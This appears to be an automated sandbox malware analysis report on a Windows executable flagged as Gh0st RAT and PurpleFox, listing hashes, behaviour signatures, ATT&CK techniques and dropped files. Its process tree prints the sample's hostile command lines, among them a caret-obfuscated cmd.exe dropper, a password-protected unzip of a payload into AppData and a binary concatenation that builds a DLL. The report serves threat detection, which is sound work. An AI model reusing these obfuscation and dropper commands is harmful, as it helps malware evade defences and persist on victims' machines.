Overview

overview

10

Static

static

e09d36724c...90.exe

windows7-x64

10

e09d36724c...90.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    139s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-10-2022 22:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe

  • Size

    56KB

  • MD5

    2c72f3642a2b4e17e8f54d4a8782c7f5

  • SHA1

    55e76b2348a1affccc66df9389aae8b5d39d6c03

  • SHA256

    e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90

  • SHA512

    739bcf49f3c5250baaffe20d175e351192d612ef4f1774b71727529b425d809f2fcc2e1b7cce5124baebcd8979b1c599a7d6017ec6aaca086aeca57ee5004000

  • SSDEEP

    768:ITlH3i10e6PQ5WKwl0JRGdGo3DhSZhmE2fI8+ZNX:UlHy1bsKwqJGGoGhmpfIfN

Score
10/10
gh0stratpurplefoxevasionratrootkittrojanupx

Malware Config

Signatures

  • Detect PurpleFox Rootkit 2 IoCs

    Detect PurpleFox Rootkit.

    rootkit
  • Gh0st RAT payload 2 IoCs
  • Gh0strat

    Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.

    ratgh0strat
  • PurpleFox

    PurpleFox is an exploit kit used to distribute other malware families and first seen in 2018.

    rootkittrojanpurplefox
  • UAC bypass 3 TTPs 3 IoCs
    evasiontrojan
  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Loads dropped DLL 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 2 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs
  • System policy modification 1 TTPs 3 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe
    "C:\Users\Admin\AppData\Local\Temp\e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe"
    1⤵
    • UAC bypass
    • Checks computer location settings
    • Checks whether UAC is enabled
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:1260
    • C:\Users\Public\Documents\k4.exe
      C:/Users/Public/Documents/k4.exe
      2⤵
      • Executes dropped EXE
      PID:1412
    • C:\Users\Public\Documents\k4.exe
      C:/Users/Public/Documents/k4.exe /D
      2⤵
      • Executes dropped EXE
      PID:4156
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /t /im k4.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1456
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /t /im k4.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4500
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b C:\\Users\\Public\\Documents\\MZ.txt+C:\\Users\\Public\\Documents\\TAS.txt C:\\Users\\Public\\Documents\\TASLoginBase.dll
      2⤵
        PID:1844
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c C:\Users\Public\Documents\2022060125.vbe
        2⤵
        • Checks computer location settings
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:3268
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\2022060125.vbe"
          3⤵
            PID:2324
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sch.vbe"
          2⤵
            PID:1868
          • C:\Users\Public\Documents\k4.exe
            "C:\Users\Public\Documents\k4.exe" /E
            2⤵
            • Executes dropped EXE
            • Checks SCSI registry key(s)
            • Suspicious use of AdjustPrivilegeToken
            PID:2972
        • C:\Windows\system32\mmc.exe
          C:\Windows\system32\mmc.exe -Embedding
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4724
          • C:\WINDOWS\system32\cmd.exe
            "C:\WINDOWS\system32\cmd.exe" /c ^c^M^D, , /v^:O ,/R " , ( , (S^ET ^l^U=^-), )&(^sET N^aV=\^Public^\Docu^m^en^t)& (^s^eT ^S^m^KR=^ver)&&(, ,, , , (^sET idZ^S=cmd ^/c C:\^U^sers^\Publi^c\Do^cu) ,)&& (sE^t ^ ^5UR2=s\^unz^ip.^d^a^t -d)&&(^sET ^b^Vx=xe^ ^-^o)& ( , (^Set ^PXyG=^e^rver^^^^^^^>Se^r) )&(s^ET ^ w^GR=:\^U^sers)&( , , , , , (^SE^t G^2T=^ ), )& (^Se^T ^78=^men^ts^\un^zip.e)& (^Set B^X=^ ""%ap^pda^ta%"")& (^SEt p^1vS=P^ )&(S^et DBh^u=^^^^^^^&^e^cho ^S)&& S^ET ^u^Yw^J=""&&( , (^SET 7D3^y=^.^dll) , )& ( ,(^SET ^ ^gE=^C) , )&& ( , (SE^T ^ ^2^R^X=Start^u^p8^888 ) , , , )& , C^All,S^E^T 4Zb=%idZ^S%%^78%%^b^Vx%%G^2T%%^l^U%%p^1vS%%^2^R^X%%^gE%%w^GR%%N^aV%%^5UR2%%B^X%%DBh^u%%^PXyG%%^S^m^KR%%7D3^y%&&, , ^CaLL , , E^CHo , %4^Z^b:""^=!uY^wJ:~0, ^-1!%"|,%pubLic:~ 14%MD,
            2⤵
            • An obfuscated cmd.exe command-line is typically used to evade detection.
            • Suspicious use of WriteProcessMemory
            PID:4108
            • C:\Windows\system32\cmd.exe
              cMD , , /v:O ,/R " , ( , (S^ET ^l^U=^-), )&(^sET N^aV=\^Public^\Docu^m^en^t)& (^s^eT ^S^m^KR=^ver)&&(, ,, , , (^sET idZ^S=cmd ^/c C:\^U^sers^\Publi^c\Do^cu) ,)&& (sE^t ^ ^5UR2=s\^unz^ip.^d^a^t -d)&&(^sET ^b^Vx=xe^ ^-^o)& ( , (^Set ^PXyG=^e^rver^^^^^^^>Se^r) )&(s^ET ^ w^GR=:\^U^sers)&( , , , , , (^SE^t G^2T=^ ), )& (^Se^T ^78=^men^ts^\un^zip.e)& (^Set B^X=^ ""%ap^pda^ta%"")& (^SEt p^1vS=P^ )&(S^et DBh^u=^^^^^^^&^e^cho ^S)&& S^ET ^u^Yw^J=""&&( , (^SET 7D3^y=^.^dll) , )& ( ,(^SET ^ ^gE=^C) , )&& ( , (SE^T ^ ^2^R^X=Start^u^p8^888 ) , , , )& , C^All,S^E^T 4Zb=%idZ^S%%^78%%^b^Vx%%G^2T%%^l^U%%p^1vS%%^2^R^X%%^gE%%w^GR%%N^aV%%^5UR2%%B^X%%DBh^u%%^PXyG%%^S^m^KR%%7D3^y%&&, , ^CaLL , , E^CHo , %4^Z^b:""^=!uY^wJ:~0, ^-1!%"
              3⤵
              • An obfuscated cmd.exe command-line is typically used to evade detection.
              PID:1020
            • C:\Windows\system32\cmd.exe
              cMD ,
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4340
              • C:\Windows\system32\cmd.exe
                cmd /c C:\Users\Public\Documents\unzip.exe -o -P Startup8888 C:\Users\Public\Documents\unzip.dat -d "C:\Users\Admin\AppData\Roaming"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2404
                • C:\Users\Public\Documents\unzip.exe
                  C:\Users\Public\Documents\unzip.exe -o -P Startup8888 C:\Users\Public\Documents\unzip.dat -d "C:\Users\Admin\AppData\Roaming"
                  5⤵
                  • Executes dropped EXE
                  • Drops startup file
                  PID:2388
        • C:\Windows\system32\mmc.exe
          C:\Windows\system32\mmc.exe -Embedding
          1⤵
          • Suspicious behavior: SetClipboardViewer
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3124
          • C:\Users\Public\Documents\dllhosts.exe
            "C:\Users\Public\Documents\dllhosts.exe"
            2⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:4468
            • C:\Users\Public\Documents\dllhosts.exe
              C:\Users\Public\Documents\dllhosts.exe
              3⤵
              • Executes dropped EXE
              • Enumerates connected drives
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4528
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 252
              3⤵
              • Program crash
              PID:4680
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4468 -ip 4468
          1⤵
            PID:2224

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Initial Access

          Execution

          Persistence

          Privilege Escalation

          Bypass User Account Control

          1
          T1088

          Defense Evasion

          Bypass User Account Control

          1
          T1088

          Disabling Security Tools

          1
          T1089

          Modify Registry

          2
          T1112

          Credential Access

          Discovery

          Query Registry

          4
          T1012

          System Information Discovery

          6
          T1082

          Peripheral Device Discovery

          2
          T1120

          Lateral Movement

          Collection

          Exfiltration

          Command and Control

          Impact

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Public\Documents\2022060125.vbe
            Filesize

            180B

            MD5

            d66c7e77096d4f4c406170b6ca0ad123

            SHA1

            9bb461061c7276ebe2a493f690d72263c0da8962

            SHA256

            cd0a0ac1315f1f473f4a42bed62fad7033fe68a3e0cf72a7b354a7e3dd78e8a8

            SHA512

            015788021b53eb278be1238b26a01499dcb809d93ee747bc89208f8d3570a7b0b813c70ea054e70584b536da4811f0a58ef38c96a984e6b3a54654774e5c7592

            Download Submit
          • C:\Users\Public\Documents\MZ.txt
            Filesize

            2B

            MD5

            ac6ad5d9b99757c3a878f2d275ace198

            SHA1

            439baa1b33514fb81632aaf44d16a9378c5664fc

            SHA256

            9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d

            SHA512

            bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

            Download Submit
          • C:\Users\Public\Documents\TAS.txt
            Filesize

            118KB

            MD5

            9efe1bc9713459a517a348502319bfa2

            SHA1

            bffe5ad1bb71e39deb5b384ebd3220f1158e43e4

            SHA256

            d9203f15b1d230e7a7955b7ba01d1877a4a323129c845ae31f1bf0b84aa51077

            SHA512

            80d1e08bb880c019f852441a9af257b48a52efb81a26d2f5c89909c79f63261e62a0b68df798193d7b32d40cda56cad1f85faf6344971aab799fa9f26591af07

            Download Submit
          • C:\Users\Public\Documents\TASLoginBase.dll
            Filesize

            119KB

            MD5

            b3e30cbd7f8042c7141a3957a33399a4

            SHA1

            1f808c68f20c396898ff95edd9fb154fc6f86840

            SHA256

            edae6213d100b2a99079e7211adaefdd469edd0fa75b3146bd710a0aab83d833

            SHA512

            b9061402648c1aba42665cf93a4e02d5aefe9ef5e409d21a715ae9e71ed4eb8de5c39bb3c47b69cd3b94a9a5e13e63c685c2cc92e4c4354be2cb2ade771547ff

            Download Submit
          • C:\Users\Public\Documents\TASLoginBase.dll
            Filesize

            119KB

            MD5

            b3e30cbd7f8042c7141a3957a33399a4

            SHA1

            1f808c68f20c396898ff95edd9fb154fc6f86840

            SHA256

            edae6213d100b2a99079e7211adaefdd469edd0fa75b3146bd710a0aab83d833

            SHA512

            b9061402648c1aba42665cf93a4e02d5aefe9ef5e409d21a715ae9e71ed4eb8de5c39bb3c47b69cd3b94a9a5e13e63c685c2cc92e4c4354be2cb2ade771547ff

            Download Submit
          • C:\Users\Public\Documents\dllhosts.exe
            Filesize

            411KB

            MD5

            66557b2bd93e70a2804e983b279ab473

            SHA1

            4e58505689fd9643b5011880ce94b22cbfadf917

            SHA256

            a63c9e3f7256e38224f7256307d954d4a6baa9f023f6ac49d8cface7b2658e31

            SHA512

            b08d8b2872f4ebdbab7b15bd96f5d185f05030983c2d704497d30fe5f610874b5ec362f0e3e55800031edcd29b812d9b58214e76012a85df074310f36e0f33f4

            Download Submit
          • C:\Users\Public\Documents\dllhosts.exe
            Filesize

            411KB

            MD5

            66557b2bd93e70a2804e983b279ab473

            SHA1

            4e58505689fd9643b5011880ce94b22cbfadf917

            SHA256

            a63c9e3f7256e38224f7256307d954d4a6baa9f023f6ac49d8cface7b2658e31

            SHA512

            b08d8b2872f4ebdbab7b15bd96f5d185f05030983c2d704497d30fe5f610874b5ec362f0e3e55800031edcd29b812d9b58214e76012a85df074310f36e0f33f4

            Download Submit
          • C:\Users\Public\Documents\dllhosts.exe
            Filesize

            411KB

            MD5

            66557b2bd93e70a2804e983b279ab473

            SHA1

            4e58505689fd9643b5011880ce94b22cbfadf917

            SHA256

            a63c9e3f7256e38224f7256307d954d4a6baa9f023f6ac49d8cface7b2658e31

            SHA512

            b08d8b2872f4ebdbab7b15bd96f5d185f05030983c2d704497d30fe5f610874b5ec362f0e3e55800031edcd29b812d9b58214e76012a85df074310f36e0f33f4

            Download Submit
          • C:\Users\Public\Documents\k4.exe
            Filesize

            892KB

            MD5

            33e29221e2825001d32f78632217d250

            SHA1

            9122127fc91790a1edb78003e9b58a9b00355ed5

            SHA256

            65d0b20a4dc4911fbb91683eb6488d3d3493fa4584bbdfb4e942f203bef0030d

            SHA512

            01d5c6ded3a83d81371e94fefb1debabb1d003c86ab3cf7145d28fb15fcfd4f8b763f6711f99c5afd9bf90f02a7af993efa5945d4f8bb6a3649b5fd86414ae93

            Download Submit
          • C:\Users\Public\Documents\k4.exe
            Filesize

            892KB

            MD5

            33e29221e2825001d32f78632217d250

            SHA1

            9122127fc91790a1edb78003e9b58a9b00355ed5

            SHA256

            65d0b20a4dc4911fbb91683eb6488d3d3493fa4584bbdfb4e942f203bef0030d

            SHA512

            01d5c6ded3a83d81371e94fefb1debabb1d003c86ab3cf7145d28fb15fcfd4f8b763f6711f99c5afd9bf90f02a7af993efa5945d4f8bb6a3649b5fd86414ae93

            Download Submit
          • C:\Users\Public\Documents\k4.exe
            Filesize

            892KB

            MD5

            33e29221e2825001d32f78632217d250

            SHA1

            9122127fc91790a1edb78003e9b58a9b00355ed5

            SHA256

            65d0b20a4dc4911fbb91683eb6488d3d3493fa4584bbdfb4e942f203bef0030d

            SHA512

            01d5c6ded3a83d81371e94fefb1debabb1d003c86ab3cf7145d28fb15fcfd4f8b763f6711f99c5afd9bf90f02a7af993efa5945d4f8bb6a3649b5fd86414ae93

            Download Submit
          • C:\Users\Public\Documents\k4.exe
            Filesize

            892KB

            MD5

            33e29221e2825001d32f78632217d250

            SHA1

            9122127fc91790a1edb78003e9b58a9b00355ed5

            SHA256

            65d0b20a4dc4911fbb91683eb6488d3d3493fa4584bbdfb4e942f203bef0030d

            SHA512

            01d5c6ded3a83d81371e94fefb1debabb1d003c86ab3cf7145d28fb15fcfd4f8b763f6711f99c5afd9bf90f02a7af993efa5945d4f8bb6a3649b5fd86414ae93

            Download Submit
          • C:\Users\Public\Documents\sch.vbe
            Filesize

            179B

            MD5

            d569f44ce5792ee816b4182e3c7bc7da

            SHA1

            f16a402cd6030b5c7faa5c85ade3005d66d5232a

            SHA256

            59ff328647ccee11ad437e02b6e84c12511333553837b6fa270eefd21a3eccbf

            SHA512

            bb0f888ff00038d1787e6cce8b09b61761d93594cbfe08d2dbf650c1802938d6df7b4b854c1af97ad405fb3b1460aab339e636852d51dc6b6849d27a5af9560b

            Download Submit
          • C:\Users\Public\Documents\unzip.dat
            Filesize

            1KB

            MD5

            e1fafb36f4da2c3be5dc9be1ad0b9805

            SHA1

            7d64a899e0ab62f3cd6ebf5bdade782c99c00713

            SHA256

            a862acb112f57458ad35e5e5fc90f0d270a7600af694a6b7052d161806e5dd69

            SHA512

            5c530b09b6459f34072dfccb7ccec5cbb791fc6cdc2633993da91fbef9c4d1172aec51ace3fb3cb8ac25b6721b4e6f5f1fd1a8fac7d95abbad8f6430e4abbc3e

            Download Submit
          • C:\Users\Public\Documents\unzip.exe
            Filesize

            164KB

            MD5

            75375c22c72f1beb76bea39c22a1ed68

            SHA1

            e1652b058195db3f5f754b7ab430652ae04a50b8

            SHA256

            8d9b5190aace52a1db1ac73a65ee9999c329157c8e88f61a772433323d6b7a4a

            SHA512

            1b396e78e189185eefb8c6058aa7e6dfe1b8f2dff8babfe4ffbee93805467bf45760eea6efb8d9bb2040d0eaa56841d457b1976dcfe13ed67931ade01419f55a

            Download Submit
          • C:\Users\Public\Documents\unzip.exe
            Filesize

            164KB

            MD5

            75375c22c72f1beb76bea39c22a1ed68

            SHA1

            e1652b058195db3f5f754b7ab430652ae04a50b8

            SHA256

            8d9b5190aace52a1db1ac73a65ee9999c329157c8e88f61a772433323d6b7a4a

            SHA512

            1b396e78e189185eefb8c6058aa7e6dfe1b8f2dff8babfe4ffbee93805467bf45760eea6efb8d9bb2040d0eaa56841d457b1976dcfe13ed67931ade01419f55a

            Download Submit
          • C:\Users\Public\Documents\unzip.lnk
            Filesize

            2KB

            MD5

            7503a871168c07ca47a87c933f004f66

            SHA1

            764d09fe3b1f756a467e4a96d5cc3453732c3cfb

            SHA256

            8a3d404f5cdd1611433ea97e8a5ebf8696d8cdcf805331201a4fb4f7203023de

            SHA512

            4f7bbab0fcdb150cf368ab9fa2d23f26082ae1ac1d1a4cebc7ea9b2724125c7f5e013b2180a08a3f0002e416e6be5e6233f47fb7f5dbebd1b503f09a5ea24831

            Download Submit
          • C:\Users\Public\Documents\update.lnk
            Filesize

            1KB

            MD5

            3af508a542bdfa6927737a2d91d74f40

            SHA1

            433f04e960f68ce05358af2d672a9b649de4e3ce

            SHA256

            e7e3e44142369b3a312005313f8569f2bcd45bcdc8ea9e141616654bcd090b60

            SHA512

            b35ad011ca3770c1a1e2a655a614e91ebd96ce29099969c727a69e77a390b91078512ce55883d7290e4dd46c5f04f0461b2833f568d23da1fc4d91ea4633d3bc

            Download Submit
          • C:\Users\Public\Documents\update.log
            Filesize

            539KB

            MD5

            721a8a8725655659c2f93fce960918c7

            SHA1

            a9d5e880b15e3ea8eb0310293b0309c26bfa5fe5

            SHA256

            644bb5f01223161bd1f763115c7addfa710c2c1c11446a11cac7eb44dc677cf2

            SHA512

            8e86944f47ba050348ec71ec79c940e9e61453ac76bb0c5da4a9ff51b45ef20931c3b5a1132d93a83d631fbf84bddcc5fc34ded82775c47ec08d8677f0f9c127

            Download Submit
          • memory/1020-150-0x0000000000000000-mapping.dmp
            Download
          • memory/1412-132-0x0000000000000000-mapping.dmp
            Download
          • memory/1456-137-0x0000000000000000-mapping.dmp
            Download
          • memory/1844-139-0x0000000000000000-mapping.dmp
            Download
          • memory/1868-144-0x0000000000000000-mapping.dmp
            Download
          • memory/2324-145-0x0000000000000000-mapping.dmp
            Download
          • memory/2388-153-0x0000000000000000-mapping.dmp
            Download
          • memory/2404-152-0x0000000000000000-mapping.dmp
            Download
          • memory/2972-177-0x0000000000000000-mapping.dmp
            Download
          • memory/3268-142-0x0000000000000000-mapping.dmp
            Download
          • memory/4108-148-0x0000000000000000-mapping.dmp
            Download
          • memory/4156-135-0x0000000000000000-mapping.dmp
            Download
          • memory/4340-151-0x0000000000000000-mapping.dmp
            Download
          • memory/4468-163-0x0000000000400000-0x0000000000490000-memory.dmp
            Filesize

            576KB

            Download
          • memory/4468-158-0x0000000000000000-mapping.dmp
            Download
          • memory/4500-138-0x0000000000000000-mapping.dmp
            Download
          • memory/4528-168-0x0000000000400000-0x0000000000547000-memory.dmp
            Filesize

            1.3MB

            Download
          • memory/4528-169-0x0000000000400000-0x0000000000547000-memory.dmp
            Filesize

            1.3MB

            Download
          • memory/4528-170-0x0000000010000000-0x000000001019F000-memory.dmp
            Filesize

            1.6MB

            Download
          • memory/4528-176-0x0000000000400000-0x0000000000547000-memory.dmp
            Filesize

            1.3MB

            Download
          • memory/4528-165-0x0000000000400000-0x0000000000547000-memory.dmp
            Filesize

            1.3MB

            Download
          • memory/4528-164-0x0000000000000000-mapping.dmp
            Download